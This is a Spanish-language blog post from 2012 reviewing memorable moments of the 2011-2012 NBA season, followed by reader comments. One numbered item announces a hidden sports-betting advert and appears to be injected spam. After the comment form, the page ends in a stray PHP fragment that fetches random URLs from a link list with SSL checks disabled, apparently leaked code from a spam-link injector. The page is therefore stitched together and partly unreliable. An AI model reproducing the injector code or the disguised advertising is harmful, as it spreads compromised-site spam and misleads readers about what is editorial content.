Reflexiones sobre la bocina #10

21 de June de 2012 por MagicJohnson32

La temporada 2011-2012 está ya en las últimas, solo a falta de que se decida el campeón, y empieza a ser hora de hacer balance. ¿Cómo la recordaremos dentro de diez años? Uno piensa ahora en la campaña del lockout del 99 y, de primeras, recuerda que fue el Año I después de Jordan y el del primer anillo de Tim Duncan; que dos rookies llamados Vince Carter y Jason Williams acaparaban los highlights; que debatíamos entre Gary Payton y Jason Kidd, entre Iverson y Kobe, entre Garnett y McDyess; jamás olvidaremos la canasta con la que Alan Houston eliminó a los Heat en primera ronda y que aquellos Knicks alcanzaron las Finales con el infame Charlie Ward como base titular; y que en un draft con Paul Pierce, Antawn Jamison y Dirk Nowitzki, los Clippers seleccionaron con el número 1, por supuesto, a Michael Olowokandi. A eso se refería Phil Jackson con lo del asterisco, probablemente.

Así pues ¿qué nos deja para el recuerdo esta 2011-2012? Veamos en primer lugar diez hechos que probablemente permanecerán en nuestra memoria durante mucho tiempo y, por último, nuestro ganador, la historia que por siempre marcará la temporada 2012 en la NBA.

– “Y vosotros pensabais que elegir a Kwame era lo peor que podía hacer. Ay, criaturillas…”

0- Tjnba.com empieza a poner publicidad escondida en los artículos. La verdad es que tampoco la escondemos mucho. Por ejemplo, ahora vamos a colar una publicidad de sports betting como quien no quiere la cosa.

1- El peor equipo de la historia. Los lectores más memoriosos tal vez recuerden un quinteto compuesto por Chris Quinn, Ricky Davis, Daequan Cook, Mark Blount y Stephane Lasme, con Earl Barron y Kasib Powell como principales jugadores de rotación. Aquellos Heat de finales de la 2007-2008 figuraban en el listado personal de quien firma estas líneas como el peor equipo de la historia. Hasta que llegaron los Bobcats 2012, que han sido al baloncesto lo que la Comic Sans a la tipografía. Ni siquiera citaré el dato del porcentaje de victorias de estos Bobcats, el más bajo jamás registrado, porque no se trata de estadísticas. Hace apenas dos años, Charlotte disponía de una plantilla con Gerald Wallace, Tyson Chandler, Stephen Jackson, Raymond Felton, Boris Diaw y Larry Hughes, más que suficiente para conseguir una plaza en los Playoffs de 2010. Y en esas, Robert Johnson vendió la franquicia a Michael Jordan, y los Bobcats se precipitaron, en caída libre, al pozo más profundo. El equipo ha producido auténtica vergüenza ajena durante toda la temporada, un sentimiento que no ha hecho más que crecer a lo largo del curso y que ni de lejos se compensaba con la certeza de asegurarse un Top 4 del draft. El azar, el karma o la mano de Stern han dejado a los Bobcats sin Anthony Davis. Fuese lo que fuese, se lo tienen merecido. Debería estar penalizado ser tan rematadamente malos. Lo que nos lleva a…

2- Operación Tanking. “Tank” significa en inglés, y según el contexto, fracasar. En el ámbito del deporte se le ha añadido al término una connotación que implica una cierta voluntariedad. Es decir: renunciar a competir. No es algo nuevo en la NBA, donde el sistema del draft premia a los peores equipos y castiga a aquellos que, sin estar entre los favoritos, juegan para ganar (el gran ejemplo de esto serían actualmente los Rockets, que por tercer año consecutivo se quedan a las puertas de los Playoffs). Esta temporada, sin embargo, ha habido muchos casos flagrantes, algo a lo que han contribuido factores como la aparente ‘profundidad’ del próximo draft, el supuesto impacto que tendrá Anthony Davis en el equipo que lo elija, la brevedad de una temporada que no ha sido propicia para cerrar traspasos, o el impacto que las lesiones han tenido sobre la competición como consecuencia de un calendario del que hablaremos con detenimiento un poco más abajo. Comprensible como resulta, no podemos evitar la sensación de que se está desvirtuando la competición. Tan descarado ha sido en algunos casos, que en los medios especializados norteamericanos se ha debatido profundamente sobre el asunto, que probablemente se solucionaría regresando al sistema antiguo, según el cual todos los equipos que no alcanzaban los Playoffs entraban en el sorteo con las mismas probabilidades. Merecen nuestro elogio equipos como Wizards y Hornets, dos de los que más motivos tenían para dejarse ir y que, sin embargo, han dado lo mejor de sí (que, reconozcámoslo, no es mucho) en cada partido hasta el último día.

3- “Basketball reasons”. Si la temporada 99 fue la del asterisco, la 2012 es la del veto. Cuando David Stern tumbó el traspaso de Chris Paul a los Lakers pudo optar entre dos cosas: decir la verdad o mentir. Y eligió lo segundo. Nos aseguró que el motivo para censurar el acuerdo al que el GM Dell Demps había llegado con Lakers y Rockets era puramente deportivo, “basketball reasons”, en sus propias y célebres palabras. Para hacer balance, nada mejor que preguntarse dónde habrían estado los Hornets con Goran Dragic, Kevin Martin, Lamar Odom y Luis Scola. Respuesta: mucho más arriba. Prefirió Stern a Eric Gordon -que no ha jugado por sus continuadas lesiones y puede abandonar la franquicia este mismo verano-, a Chris Kaman -al que no quieren en New Orlenas ni en ningún otro sitio-, y a Aminu -que es infinitamente peor jugador que cualquiera de los incluidos en el acuerdo original. Eso sí, la plantilla resultante es tan pobre que incluso jugando cada partido para ganar se han llevado el número 1 del draft.

4- Oh, cielos, otro DNP”. Vamos con una encuesta rápida. ¿Qué implica mayores riesgos para la integridad física?

A) el calendario de la temporada 2011-2012 de la NBA

B) un Borbón con una escopeta

Salvo que seas un elefante o el zapato de Froilán, la respuesta correcta ha de ser la A. El calendario ultracondensado que la NBA diseñó una vez desbloqueadas las negociaciones para la firma del nuevo convenio colectivo ha sido un campo de minas para los jugadores, que han ido cayendo como moscas. Stern no se guió por “basketball reasons” a la hora de confeccionar el calendario sino que trató de salvar los ingresos de la temporada, aun a costa de multiplicar el impacto de las lesiones. Este año más que nunca, los box scores han estado repletos de DNP y hacer las alineaciones en nuestras fantasy leagues ha sido una pesadilla. No llegaremos al punto de culpar al calendario de las lesiones de Rose, Howard, Shumpert, Bosh… pero, en serio ¿qué necesidad había de hacer un calendario de 66 partidos en apenas 120 días?

5- Dwight ‘Clark Kent’ Howard. El jugador anteriormente conocido como Superman, el rey de las zonas de la NBA, el tipo que nos resultaba tan simpaticote y payasete fuera de las canchas como dominante e intimidador dentro de ellas, ha descubierto su kriptonita. Y no es otra que su propia personalidad. Si “The Decision” de LeBron ya nos pareció de mal gusto, lo que ha hecho Howard este año ha superado el esperpento. Incluso Wade, que es un tipo comedido, se burló cuando escuchó a Dwight hablar de “lealtad”. Tan empeñado siempre en hacernos reír, Howard nos provocó las mayores carcajadas sin pretenderlo. Si quiere rescatar su imagen, más le vale a DH12 renovar su equipo de relaciones públicas y empezar a trabajar desde ya en cómo van a manejar este último año de contrato en los Magic y su más que probable salida de la franquicia de Florida.

Liquidación. Últimas unidades. Por la compra de una camiseta de Gasol, de regalo una de Devean George. O dos.

6- El adiós de Pau Gasol a los Lakers. No nos engañemos: se ha acabado. No es ni mucho menos oficial, y es cierto que existe algún posible escenario que permitiría pensar en la continuidad de Gasol en la plantilla angelina, escenario que pasaría por una suma de circunstancias, tales como el improbable traspaso de Andrew Bynum. Pero, en realidad, la trayectoria de Pau en los Lakers se acabó el 25 de mayo de 2011, aunque entonces ni él ni nosotros lo supimos. Aquel día, los Lakers anunciaron la contratación de Mike Brown como head coach y, al mismo tiempo, pusieron fecha de caducidad a la camiseta con el dorsal 16. Hemos discutido en este blog (y más que discutiremos) sobre la incapacidad de Brown por sacar más provecho de la calidad de Gasol y la responsabilidad del propio jugador en la decadencia de su juego. Lo que recordaremos dentro de diez años será, en cambio, el extraordinario bagaje que deja la etapa 2008-2012, en la que Los Angeles Lakers retomaron el papel de franquicia ganadora y añadieron al techo del Staples Center otros dos estandartes de campeones de la NBA. Y todo ello, con Gasol como figura capital e imprescindible para entender semejante éxito.

7- Ricky / Kyrie. Fueron apenas unas semanas, un par de meses tal vez, pero durante ese tiempo hubo debate y con toda justicia. Nos preguntábamos “¿quién es mejor, Rubio o Irving?”, “¿quién merece el ROY?”, “¿cuál de ellos será más dominante en el futuro?”. La lesión dejó a Ricky fuera de la carrera por el premio de mejor novato, pero el resto de preguntas mantienen su validez. Por lo que ha demostrado esta temporada en los Cavs, es más que probable que dentro de diez años Kyrie Irving sea una de las grandes estrellas de la liga. ¿Qué será de Ricky Rubio? Primero ha de recuperarse de la rodilla, y a partir de ahí, retomar las riendas de los Wolves y trabajar en su suspensión, pero se me ocurren pocos rookies que hayan sido capaces de controlar los partidos sin anotar como tantas veces le hemos visto al base catalán, quien -vale la pena recordar- solo tiene 21 años.

8- El primer anillo de ………………… (rellene la línea de puntos con el nombre del MVP de las Finales, una vez hayan concluido, sea LeBron James o Kevin Durant). Decíamos en la introducción que el 99 fue el año del primer anillo de Tim Duncan. Del mismo modo, dentro de una década recordaremos la temporada 2012 como la del título que inauguró la cuenta de LeBron James o Kevin Durant. Resulta impensable que cualquiera de estos dos jugadores acaben su trayectoria sin algún anillo. Lo que no podemos anticipar es si volverán a enfrentarse en circunstancias tan particulares como estas: James ha sido el MVP de la temporada y Durant, el máximo anotador, y ambos llegan a las Finales como líderes indiscutibles de sus respectivos equipos y erigidos como máximos representantes de los nuevos tiempos en el baloncesto tras haber superado por el camino a los fantasmas de las navidades pasadas (léase: Lakers, Spurs, Mavs, Celtics). Quien salga ganador de estas Finales, LeBron o KD, partirá con ventaja en lo que todo apunta a que será una carrera de dos por la consideración de mejor jugador de su tiempo.

9- Boris Diaw VS La dieta Dukan. ¿LeBron VS Durant? ¡No! El combate del año ha tenido acento francés. Mientras un tipo francés llamado Dukan, un fraude en bata de médico, lavaba el cerebro de millones de personas para que arriesgaran su salud con tal de perder unos kilos, nuestro estimadísimo Boris Diaw decidió sacrificarse para demostrar que el peso no es tan importante. Diaw aprovechó el tiempo extra del lockout y se puso encima unos 25 kilitos de más. Y así, desafiado todas las leyes de la física, no solo dejó probado que se puede jugar en la NBA con sobrepeso, sino que pasó de suplente en el peor equipo de la liga a titular en el mejor.

– “¡Cejijuntos, preparad el desayuno y alimentaos bien, porque esta noche cenaremos EN EL INFIERNO!”

10- Anthony Davis, el espartano. Si el logro de Diaw tiene mérito ¿qué podemos decir del de Anthony Davis? Lo suyo es heróico. No, por supuesto que no nos referimos a su excelente rendimiento en los Wildcats, con el que se ha hecho merecedor del primer puesto en el draft. No, hablamos de su resistencia numantina, de tintes épicos, a depilarse la ceja. Su ceja. Ese pedazo de ceja suya, que es más que una ceja, es un símbolo, un icono, un emblema. Medio planeta, concretamente los 3 mil millones de habitantes de género femenino, desea avalanzarse sobre esa ceja y mutilarla, pero allí donde la gran mayoría de los hombres hemos capitulado en multitud de ocasiones, nuestro héroe sigue resistiendo. Imagino a Davis, cual Leónidas, liderando a sus 300 cejijuntos ante un ejército de mujeres armadas con pinzas de depilación, y se me erizan los vellos.

GANADOR – El fenómeno ‘Linsanity’. El 4 de febrero de 2012, durante un Knicks-Nets, algo especial sucedió en el Madison Square Garden. Un chaval de rasgos orientales, de quien apenas habíamos tenido noticia, se convirtió en el protagonista de la historia del año en el deporte americano. A la mañana siguiente, las crónicas explicaban que ese chaval se llamaba Jeremy Lin, y desvelaban que Lin es graduado en Harvard y que es estadounidense de padres taiwaneses, y nosotros no le prestamos demasiada atención, porque, nos decíamos, un buen día lo tiene cualquiera, como si nosotros pudiésemos meter 25 puntos, dar 7 asistencias, coger 5 rebotes y robar dos balones ante Deron Williams. Pero no fue un buen día, ni dos, ni diez. Fue un mes y medio, cerca de una treintena de partidos, en los que Lin levantó a un equipo moribundo y lo impulsó a los Playoffs, los Knicks vendieron más camisetas que hamburguesas y, lo más importante, una afición vibró como no lo hacía desde, precisamente, 1999. Ah, y mientras todo eso pasaba, 29 GM se daban cabezazos hasta reventar las mesas de sus despachos por no haber ni intuido la calidad de un jugador que no fue drafteado y que antes de su explosión había pasado un año entre la D-League y el banquillo de los Warriors, franquicia que lo cortó con el objetivo de tener el espacio salarial suficiente para hacer una oferta por DeAndre Jordan. Brillante ¿verdad?

Comenta

12 comentarios a esta entrada

  1. Ru dice:
    #1

    Madre mia,ha sido llegar a lo de Davis y no parar de reir…ya veo a medio pabellón de los Hornets con postizos encima de sus ojos…jajjaja

      Citar

  2. simon dice:
    #2

    EX-CE-LEN-TE
    Como dice Ru lo de Davis que bueno, me he imaginado al pobre corriendo delante de una orda de mujeres jajajajaja que risa.

    Por cierto un apunte sobre el punto 6. jejejej yo creo que lo que hemos debatido y podremos debatir es si Gasol puede seguir siendo el mismo si jugara mas cerca del aro o si su rendimiento seguiria siendo pobre pero creo que nadie duda de que Brown es un inepto y es incapaz de sacar mas provecho de la calidad de cualquier jugador, en este segundo punto no hay duda.

      Citar

  3. Sancho88 dice:
    #3

    Wow, símplemente excepcional. Magic, lo has vuelto a hacer, nos has sacado unas carcajadas gracias a un humor muy currado a la par que friki y elegante, jejeje. No, en serio, supergenial artículo. Este tipo de cosas no se publicarían en Marca por excesiva calidad. Así da gusto!! Lo de Davis con los 300 cejijuntos de un ejército de cejijuntos ha sido el súmun!! algo totalmente orgásmico. Este artículo será gratamente recordado porque es un resumen perfecto con todos los momentos geniales de este año. Me encantaría tener un recuerdo por año como resumen en forma de reflexiones sobre la bocina, jejeje. Ya sabes, este artículo ya es un imperdible y debe ser llevado para forjarse en los montes del destino temporada tras temporada. Espartano, tienes un nuevo oficio!!! Reflexiones sobre la bocina obligatoria al final de cada temporada, ha sido genial. Enhorabuena crack!!

      Citar

  4. Vader dice:
    #4

    Muy buen resumen y muy divertido 🙂

    Por cierto Ariza y Okafor a los Wizards a cambio de Rashard Lewis y una segunda ronda. Ojito con los Wizards que tienen la tercera elección del draft y Wall, Nene, Ariza, Okafor, Vesely, Crawford…

      Citar

  5. GreenPride dice:
    #5

    Buenísimo Magic. Hasta el 10 me parecía muy bueno el artículo pero después de lo de Davis no tengo calificativos… que risa!!
    simon, sobre el punto 6 no te quepa duda Brown es un inepto baloncestísticamente hablando

      Citar

  6. Eduardo dice:
    #6

    Enhorabuena por el atículo, nos ha gustado mucho! 😉
    El punto 9 sobre Diaw VS Dukan también ha sido muy gracioso.
    Saludos a todos, y seguir así, os leo todos los días.
    Inevitablemente, y mucho a mi pesar (y al de muchos me temo), Lebron va a conseguir su primer anillo. Me hubiera gustado que lo hubiera hecho antes (o después, jaja) cuando tiraba del carro de esos Cavs. Que se haya tenido que unir a Wade (para mí uno de los mejores jugadores, y el único que me ha recordado a MJ en algunos momentos) y a Bosh para conseguirlo,,..pues le quita algo de mérito, pero qué se le va a hacer. Como dijo MJ, a él no se le hubiera ocurrido llamar a Bird y a Magic para jugar juntos y ganar un anillo.
    Lo dicho, saludos a todos!

      Citar

  7. MagicJohnson32 dice:
    #7

    Gracias, gente. Lo cierto es que me estaba quedado muy serio, y he pensado que las reflexiones no serían lo mismo sin, al menos, una ida de olla.

    @simon. Desde luego, de eso nadie ofrece la más mínima duda. El debate siempre ha girado, creo yo, en torno al papel, la actitud y la parte de responsabilidad de Pau. No me quiero liar con esto, porque como digo, habrá tiempo durante el verano de volver al tema.

    @Sancho. Hombre, si tengo que reducir la calidad de los textos para que me den un trabajo en el Marca… no está la cosa como para ir de elitista por la vida, jeje. Y acepto el compromiso de unas reflexiones de resumen de temporada (ya sabéis que me cuesta sacarlas, pero hombre, con 365 días por delante, algo se me ocurrirá, digo yo).

      Citar

  8. Txusma dice:
    #8

    Eduardo:
    Inevitablemente, y mucho a mi pesar (y al de muchos me temo), Lebron va a conseguir su primer anillo. Me hubiera gustado que lo hubiera hecho antes (o después, jaja) cuando tiraba del carro de esos Cavs. Que se haya tenido que unir a Wade (para mí uno de los mejores jugadores, y el único que me ha recordado a MJ en algunos momentos) y a Bosh para conseguirlo,,..pues le quita algo de mérito, pero qué se le va a hacer. Como dijo MJ, a él no se le hubiera ocurrido llamar a Bird y a Magic para jugar juntos y ganar un anillo.
    Lo dicho, saludos a todos!

    No, a Bird y Magic no pero se juntó con Scottie Pippen y Dennis Rodman que no eran precisamente unos mindundis… Y Kevin Durant juega al lado de Westbrook, Harden, Ibaka… Wade si que lo ganó prácticamente solo y Dirk Nowitzki el año pasado tampoco tenía un super clase a su lado pero el anillo de Lebron será merecidísimo.

      Citar

  9. M dice:
    #9

    ¡Genial! Enhorabuena. Pero no te engañes, no hay ejército de Jerjes comparable a 4 mujeres con ansias depilatorias xDDD

      Citar

  10. MagicJohnson32 dice:
    #10

    M:
    ¡Genial! Enhorabuena. Pero no te engañes, no hay ejército de Jerjes comparable a 4 mujeres con ansias depilatorias xDDD

    Juas juas… Cierto, qué me vas a contar que yo no sepa 😀 😀 😀

      Citar

  11. MagicJohnson32 dice:
    #11

    Pues nada. Ventaja: LeBron.

      Citar

  12. portu dice:
    #12

    Un auténtico superlujo este Magic…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>